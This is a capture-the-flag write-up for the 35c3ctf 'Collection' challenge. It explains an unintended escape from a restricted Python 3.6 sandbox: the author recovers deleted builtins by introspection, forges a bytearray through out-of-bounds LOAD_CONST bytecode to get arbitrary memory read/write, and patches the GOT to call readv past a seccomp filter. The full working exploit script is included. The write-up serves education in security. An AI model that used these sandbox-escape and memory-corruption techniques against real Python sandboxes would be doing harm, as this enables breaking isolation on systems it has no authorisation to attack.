35c3ctf: Collection - an Unintended Solution!

By David Buchanan, 30th December 2018

The challenge provided the following files:

dist/
dist/server.py
dist/Collection.cpython-36m-x86_64-linux-gnu.so
dist/test.py
dist/python3.6
dist/libc-2.27.so

server.py is a python script which accepts some user input. It also opens the flag for you and uses dup2 to duplicate the file descriptor to fd 1023. Then, it executes your input with the provided python3.6 interpreter. One small catch is that the following snippet is prepended to your code:

from sys import modules
del modules['os']
import Collection
keys = list(__builtins__.__dict__.keys())
for k in keys:
    if k != 'id' and k != 'hex' and k != 'print' and k != 'range':
        del __builtins__.__dict__[k]

This code attempts to set up a basic Python sandbox. The general idea behind this challenge is to escape the sandbox so that you can read the flag from the already opened file descriptor.

The intended solution is to exploit the custom Collection module which has been made. However, my solution doesn't use it at all :P

First, let's look at what the sandbox prefix actually does:

It deletes os from sys.modules.
It imports the Collection native module.
It deletes every builtin function from the __builtins__ object, except for a few: id, hex, print and range - presumably because the challenge author was feeling generous.

The first step of my unintended solution relies on the fact that sandboxing Python is very hard to do properly. Removing an object from sys.modules or __builtins__ doesn't irreversibly delete it. There will still be plenty of references to it lying around; we just have to search a bit for them.

I used introspection to get back some of the basic builtins to maintain my sanity:

str = "".__class__
bytes = b"".__class__
bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0]
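The same trick generalises to any builtin type. Here is a minimal sketch of a lookup helper that only relies on literals and attribute access, so it needs nothing from __builtins__. The name find_type is mine, and it matches on the exact class name rather than on a substring of str(x):

```python
def find_type(name):
    # ().__class__ is tuple, and tuple.__base__ is object, so this walks
    # every direct subclass of object without naming any builtin.
    for cls in ().__class__.__base__.__subclasses__():
        if cls.__name__ == name:
            return cls
    raise LookupError(name)


recovered_bytearray = find_type("bytearray")
recovered_dict = find_type("dict")

print(recovered_bytearray(b"still here"))
```

Matching on the exact name avoids accidentally picking up something like bytearray_iterator, which the substring test only dodges because bytearray happens to come first.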

Getting back os was a bit more tricky, but still doable:

os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os

(This one is probably a bit more complex than it needs to be, but hey, it works...)
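Broken into steps, the chain looks like this. This is just the one-liner unrolled, with intermediate names of my choosing; it assumes os had been imported at some point before it was deleted from sys.modules, so that os.path is still registered there:

```python
# 1. object, reached through a tuple literal
object_type = ().__class__.__bases__[0]

# 2. importlib's ModuleSpec class, which is a plain Python class
module_spec = [t for t in object_type.__subclasses__()
               if t.__name__ == "ModuleSpec"][0]

# 3. Its __repr__ is a Python function, so it carries the globals of the
#    module it was defined in, and that module holds a reference to sys.
recovered_sys = module_spec.__repr__.__globals__["sys"]

# 4. os.path (posixpath on Linux) is still in sys.modules, and it keeps
#    its own reference to the os module as an attribute.
recovered_os = recovered_sys.modules["os.path"].os

print(recovered_os.__name__)
```

Deleting modules['os'] only removes one name for the module object; posixpath's reference keeps it alive and reachable.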

Now that we have os, we can just call os.read(1023, 100), right? Unfortunately, if we try that, we get the following output:

Bad system call (core dumped)

What's going on? It turns out that the Collection module sets up a seccomp filter, which restricts what syscalls we can use.

I used seccomp-tools in order to extract the filters:

$ seccomp-tools dump "./python3.6 -c 'import Collection'"
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x01 0x00 0xc000003e  if (A == ARCH_X86_64) goto 0003
 0002: 0x06 0x00 0x00 0x00000000  return KILL
 0003: 0x20 0x00 0x00 0x00000000  A = sys_number
 0004: 0x15 0x00 0x01 0x0000003c  if (A != exit) goto 0006
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0006: 0x15 0x00 0x01 0x000000e7  if (A != exit_group) goto 0008
 0007: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0008: 0x15 0x00 0x01 0x0000000c  if (A != brk) goto 0010
 0009: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0010: 0x15 0x00 0x01 0x00000009  if (A != mmap) goto 0012
 0011: 0x05 0x00 0x00 0x00000011  goto 0029
 0012: 0x15 0x00 0x01 0x0000000b  if (A != munmap) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x15 0x00 0x01 0x00000019  if (A != mremap) goto 0016
 0015: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0016: 0x15 0x00 0x01 0x00000013  if (A != readv) goto 0018
 0017: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0018: 0x15 0x00 0x01 0x000000ca  if (A != futex) goto 0020
 0019: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0020: 0x15 0x00 0x01 0x00000083  if (A != sigaltstack) goto 0022
 0021: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0022: 0x15 0x00 0x01 0x00000003  if (A != close) goto 0024
 0023: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0024: 0x15 0x00 0x01 0x00000001  if (A != write) goto 0026
 0025: 0x05 0x00 0x00 0x00000037  goto 0081
 0026: 0x15 0x00 0x01 0x0000000d  if (A != rt_sigaction) goto 0028
 0027: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0028: 0x06 0x00 0x00 0x00000000  return KILL
 ...
--- SNIP - relatively unimportant secondary checks omitted ---
 ...
 0098: 0x06 0x00 0x00 0x00000000  return KILL

TL;DR, we can use the following syscalls:

exit
exit_group
brk
munmap
mremap
readv
futex
sigaltstack
close
rt_sigaction

We can also write to stderr and stdout (I think?), and also use mmap under certain conditions that I couldn't be bothered to decode (we won't be needing this anyway).
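To double-check the list, the visible part of the dump can be replayed with a tiny classic-BPF interpreter. This is only a sketch: it covers just the four instruction encodings that appear in the rows above (0x20 load, 0x15 jump-if-equal, 0x05 jump, 0x06 return), and the names PROGRAM and verdict are mine. Anything that jumps into the snipped region is reported as CONDITIONAL.

```python
ARCH_X86_64 = 0xC000003E
SECCOMP_RET_ALLOW = 0x7FFF0000

# (code, jt, jf, k) for lines 0000-0028 of the dump above
PROGRAM = [
    (0x20, 0, 0, 0x04), (0x15, 1, 0, ARCH_X86_64), (0x06, 0, 0, 0),
    (0x20, 0, 0, 0x00),
    (0x15, 0, 1, 0x3C), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # exit
    (0x15, 0, 1, 0xE7), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # exit_group
    (0x15, 0, 1, 0x0C), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # brk
    (0x15, 0, 1, 0x09), (0x05, 0, 0, 0x11),               # mmap -> 0029
    (0x15, 0, 1, 0x0B), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # munmap
    (0x15, 0, 1, 0x19), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # mremap
    (0x15, 0, 1, 0x13), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # readv
    (0x15, 0, 1, 0xCA), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # futex
    (0x15, 0, 1, 0x83), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # sigaltstack
    (0x15, 0, 1, 0x03), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # close
    (0x15, 0, 1, 0x01), (0x05, 0, 0, 0x37),               # write -> 0081
    (0x15, 0, 1, 0x0D), (0x06, 0, 0, SECCOMP_RET_ALLOW),  # rt_sigaction
    (0x06, 0, 0, 0),                                      # default: KILL
]


def verdict(sys_number, arch=ARCH_X86_64):
    # seccomp_data layout: syscall number at offset 0, arch at offset 4
    data = {0: sys_number, 4: arch}
    acc, pc = 0, 0
    while pc < len(PROGRAM):
        code, jt, jf, k = PROGRAM[pc]
        pc += 1
        if code == 0x20:      # load 32-bit word from seccomp_data
            acc = data[k]
        elif code == 0x15:    # jump if A == k
            pc += jt if acc == k else jf
        elif code == 0x05:    # unconditional relative jump
            pc += k
        elif code == 0x06:    # return
            return "ALLOW" if k == SECCOMP_RET_ALLOW else "KILL"
    return "CONDITIONAL"      # jumped into the part of the filter I snipped


for name, number in [("read", 0), ("write", 1), ("mmap", 9),
                     ("readv", 19), ("writev", 20)]:
    print(name, verdict(number))
```

Note that writev itself is not on the list either, only readv is. That doesn't matter for the rest of this writeup, because the filter only sees the syscall that actually gets executed.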

The most important thing, which we will need in order to read the flag is readv. readv is very similar to the read syscall, except it can perform multiple reads into an array of buffers, all at once. We should be able to use this to read the flag (making use of some of the previously sandboxed objects we restored earlier):

flag = bytearray(128)
os.readv(1023, [flag])
print(flag)

But we are met with the following output!

Trace/breakpoint trap (core dumped)

After some more investigation, it turns out the Collection module has one more trick up its sleeve! When the module is loaded, it patches the main python executable at runtime, and overwrites most of the os_readv_impl function with 0xCC bytes (the x86 int3 breakpoint instruction, hence the trap above). It's clear that the author of the challenge wanted to prevent us from solving this challenge the "easy" way - since we can't use os.readv any more, we will have to get some kind of native code execution in order to call the readv syscall ourselves.

Normally, getting native code execution in Python would be easy, just use the ctypes module. However, due to the seccomp restrictions we are unable to load any additional modules. After a bit of research, I encountered this technique for setting up an arbitrary read/write primitive by using custom Python bytecode. It's written for python2, but we can adjust the same concept to work with our 64-bit python3.6 build. This technique looks pretty complex (it kinda reminds me of how some WebKit exploits work), so let's break it down.

The core of this python feature/bug lies in how python interprets its bytecode - specifically the LOAD_CONST opcode:

/* Python/ceval.c line 1298 */
TARGET(LOAD_CONST) {
    PyObject *value = GETITEM(consts, oparg);
    Py_INCREF(value);
    PUSH(value);
    FAST_DISPATCH();
}

The macro GETITEM(consts, oparg) retrieves the object at index oparg of the consts tuple, without any bounds checks (but only when Py_DEBUG is not defined!).
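For well-formed code, the operand of LOAD_CONST is always a valid index into co_consts, which is why the interpreter gets away with skipping the check. A quick way to see the relationship from the Python side, using the dis module (the function sample is just a throwaway example of mine):

```python
import dis


def sample():
    label = "sentinel constant"
    return label


code = sample.__code__
loads = [ins for ins in dis.get_instructions(sample)
         if ins.opname == "LOAD_CONST"]

for ins in loads:
    # ins.arg is the raw operand, i.e. the index GETITEM would use
    print(ins.opname, ins.arg, repr(code.co_consts[ins.arg]))

# Indexing the tuple from Python is bounds-checked...
try:
    code.co_consts[len(code.co_consts)]
except IndexError as exc:
    print("IndexError:", exc)
# ...whereas the C macro in a release build just does pointer arithmetic.
```

The compiler never emits an out-of-range index, but nothing stops us from writing one by hand.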

We can exploit this as follows:

Craft a fake bytearray object on the heap.
Work out the offset from the consts tuple to a pointer-to-the-fake-bytearray.
Craft some bytecode to return a reference to our fake bytearray.
Call the custom bytecode.
Use our crafted bytearray to read/write any address!
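The bytecode for step 3 is tiny. Python 3.6 uses 2-byte instructions (one opcode byte, one argument byte), and larger arguments are built up 8 bits at a time with EXTENDED_ARG prefixes. A rough sketch of the encoding, plus a decoder to check it, assuming the 3.6 opcode numbers (they differ in other versions) and with function names of my own:

```python
# Opcode numbers from dis.opmap on Python 3.6
LOAD_CONST = 100
EXTENDED_ARG = 144
RETURN_VALUE = 83


def encode_load_const(index):
    """Emit EXTENDED_ARG x3, LOAD_CONST, RETURN_VALUE for a 32-bit index."""
    if not -2**31 <= index < 2**31:
        raise ValueError("index does not fit in a signed 32-bit oparg")
    raw = index & 0xFFFFFFFF  # two's complement view of negative indices
    code = bytearray()
    for shift in (24, 16, 8):
        code += bytes([EXTENDED_ARG, (raw >> shift) & 0xFF])
    code += bytes([LOAD_CONST, raw & 0xFF])
    code += bytes([RETURN_VALUE, 0])  # argument byte is ignored here
    return bytes(code)


def decode_oparg(code):
    """Recombine the argument bytes the way EXTENDED_ARG does."""
    oparg = 0
    for i in range(0, len(code), 2):
        opcode, arg = code[i], code[i + 1]
        oparg = (oparg << 8) | arg
        if opcode != EXTENDED_ARG:
            break
    # the interpreter keeps oparg in a C int, so reinterpret as signed
    return oparg - 2**32 if oparg >= 2**31 else oparg


print(encode_load_const(0x01020304).hex())
print(decode_oparg(encode_load_const(-5)))
```

Negative indices are fine too, which matters because the fake object may well sit at a lower address than the tuple.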

To understand the details of this, we need to look at how CPython stores tuples and bytearrays internally. I've reconstructed the following from the CPython source (The original definitions are full of macros etc.):

struct PyByteArrayObject {
    int64_t ob_refcnt;   /* can be basically any value we want */
    struct _typeobject *ob_type; /* points to the bytearray type object */
    int64_t ob_size;     /* Number of items in variable part */
    int64_t ob_alloc;    /* How many bytes allocated in ob_bytes */
    char *ob_bytes;      /* Physical backing buffer */
    char *ob_start;      /* Logical start inside ob_bytes */
    int32_t ob_exports;  /* Number of active buffer exports (e.g. memoryviews), 0 is fine for us */
};

struct PyTupleObject {
    int64_t ob_refcnt;
    struct _typeobject *ob_type;
    int64_t ob_size;
    PyObject *ob_item[1]; /* contains ob_size elements */
};

Step 1 is easy: we can just put some data inside a real bytearray, and it will be stored on the heap. Step 2 is also easy - Python has a builtin function id which (in CPython) returns the memory address of an object. If we add 0x20 to the address of the real bytearray, we get the address of its ob_bytes pointer, which points to our crafted fake bytearray on the heap. Similarly, adding 0x18 to the value returned by id for the tuple gives the address of its ob_item array. The difference between those two addresses, divided by 8 (the size of a pointer), is the index we need. One thing to note is that the index LOAD_CONST uses is only a signed 32-bit value, so the two objects have to be reasonably close together in memory - but in practice, this didn't cause any issues.
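The 0x20 and 0x18 offsets can be sanity-checked by mirroring the two structs with ctypes. This is only arithmetic on the layouts as I reconstructed them above (64-bit build assumed, pointers modelled as plain 64-bit integers), it doesn't touch any real object memory. The helper const_index and the example addresses are hypothetical:

```python
import ctypes


class FakeByteArray(ctypes.Structure):
    _fields_ = [
        ("ob_refcnt", ctypes.c_int64),
        ("ob_type", ctypes.c_uint64),
        ("ob_size", ctypes.c_int64),
        ("ob_alloc", ctypes.c_int64),
        ("ob_bytes", ctypes.c_uint64),
        ("ob_start", ctypes.c_uint64),
        ("ob_exports", ctypes.c_int32),
    ]


class TupleHeader(ctypes.Structure):
    _fields_ = [
        ("ob_refcnt", ctypes.c_int64),
        ("ob_type", ctypes.c_uint64),
        ("ob_size", ctypes.c_int64),
        ("ob_item", ctypes.c_uint64 * 1),
    ]


OB_BYTES_OFFSET = FakeByteArray.ob_bytes.offset  # 0x20
OB_ITEM_OFFSET = TupleHeader.ob_item.offset      # 0x18


def const_index(bytearray_addr, tuple_addr):
    """Index i such that &tuple->ob_item[i] == &bytearray->ob_bytes."""
    delta = (bytearray_addr + OB_BYTES_OFFSET) - (tuple_addr + OB_ITEM_OFFSET)
    index = delta // 8
    if not -2**31 <= index < 2**31:
        raise ValueError("objects are too far apart for a 32-bit oparg")
    return index


# Hypothetical addresses, standing in for id(fake_bytearray) and id(const_tuple)
print(hex(OB_BYTES_OFFSET), hex(OB_ITEM_OFFSET))
print(const_index(0x7F0000001000, 0x7F0000000FF8))
```

In the real exploit the two addresses come from id(), so the index changes from run to run but is computed the same way.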

Once we have a read/write primitive, we can just replace the libc function writev with readv in the GOT, so that we can use the python function os.writev in place of os.readv. This works due to the fact that readv and writev are basically "symmetrical" in the way they work.
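To illustrate the symmetry: both calls take a file descriptor and a list of buffers, and both return a byte count, so the Python wrapper for one will happily marshal arguments for the other. A small demonstration on an ordinary pipe (nothing to do with the challenge fd):

```python
import os

read_end, write_end = os.pipe()

# writev gathers from several buffers into one write...
written = os.writev(write_end, [b"35C3_", b"example"])

# ...and readv scatters one read across several writable buffers.
head = bytearray(5)
tail = bytearray(16)
received = os.readv(read_end, [head, tail])

os.close(read_end)
os.close(write_end)

print(written, received, bytes(head), bytes(tail[:received - len(head)]))
```

The one difference that matters is that readv needs writable buffers, which is why the exploit passes a bytearray rather than bytes to os.writev.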

With that all explained, this is what my final exploit looked like:

# recreate things we can't import
str = "".__class__
bytes = b"".__class__
bytearray = [x for x in b"".__class__.__base__.__subclasses__() if "bytearray" in str(x)][0]
os = [t for t in ().__class__.__bases__[0].__subclasses__() if 'ModuleSpec' in t.__name__][0].__repr__.__globals__['sys'].modules["os.path"].os

# from dis.opmap
OP_LOAD_CONST   = 100
OP_EXTENDED_ARG = 144
OP_RETURN_VALUE = 83

# packing utilities
def p8(us):
	return bytes([us&0xff])

def p64(n):
	result = []
	for i in range(0, 64, 8): result.append((n>>i)&0xff)
	return bytes(result)

def u64(n):
	res = 0
	for x in n[::-1]: res = (res<<8) | x
	return res

const_tuple = ()

# construct the fake bytearray
fake_bytearray = bytearray(
	p64(0x41414141) +          # ob_refcnt
	p64(id(bytearray)) +       # ob_type
	p64(0x7fffffffffffffff) +  # ob_size (INT64_MAX)
	p64(0) +                   # ob_alloc (doesn't seem to really be used?)
	p64(0) +                   # *ob_bytes (start at address 0)
	p64(0) +                   # *ob_start (ditto)
	p64(0)                     # ob_exports (not really sure what this does)
)

fake_bytearray_ptr_addr = id(fake_bytearray) + 0x20
const_tuple_array_start = id(const_tuple) + 0x18
offset = (fake_bytearray_ptr_addr - const_tuple_array_start) // 8

print(offset)

# construct the bytecode
bytecode = b""
for i in range(8, 32, 8)[::-1]:
	bytecode += p8(OP_EXTENDED_ARG) + p8(offset>>i)
bytecode += p8(OP_LOAD_CONST) + p8(offset)
bytecode += p8(OP_RETURN_VALUE)

def foo(): pass
foo.__code__ = foo.__code__.__class__(
	0, 0, 0, 0, 0,
	bytecode, const_tuple,
	(), (), "", "", 0, b""
)
magic = foo() # magic is now a window into most of the address space!

print(magic[0x400000:0x400000+4]) # read the elf header as a sanity check

readv_got = 0x9b3d80
writev_got = 0x9b3b28
read_got = 0x9b32e8
diff = 0x116600 - 0x110070 # libc_readv - libc_read

libc_read = u64(magic[read_got:read_got+8])
print("libc_read @", hex(libc_read))

libc_readv = libc_read + diff
print("libc_readv @", hex(libc_readv))

# replace writev with readv in the GOT
magic[writev_got:writev_got+8] = p64(libc_readv)

flag = bytearray(100)
flaglen = os.writev(1023, [flag]) # actually readv!!!
print(flag[:flaglen])
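For anyone adapting this, the address arithmetic in the last part is the usual "leak one libc pointer, add a known delta" pattern. A standalone sketch using the struct module instead of my hand-rolled p64/u64 (which only exist because the sandbox blocks imports); the two offsets are the ones from the exploit above, while the leaked address is a made-up example:

```python
import struct

LIBC_READ_OFFSET = 0x110070   # read in the provided libc-2.27.so
LIBC_READV_OFFSET = 0x116600  # readv in the same libc


def p64(value):
    return struct.pack("<Q", value)


def u64(raw):
    return struct.unpack("<Q", raw)[0]


def readv_from_read(leaked_read):
    # Both symbols live in the same mapping, so their distance is constant
    # no matter where ASLR puts libc.
    return leaked_read + (LIBC_READV_OFFSET - LIBC_READ_OFFSET)


# Hypothetical value, standing in for the 8 bytes read from read's GOT slot
got_slot = p64(0x7FFFF7AF4070)
libc_read = u64(got_slot)

print(hex(libc_read - LIBC_READ_OFFSET))   # implied libc base
print(hex(readv_from_read(libc_read)))
```

The GOT addresses themselves are specific to the provided python3.6 binary, so they would need to be looked up again for any other build.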

PS: I found another good writeup of the LOAD_CONST "bug" here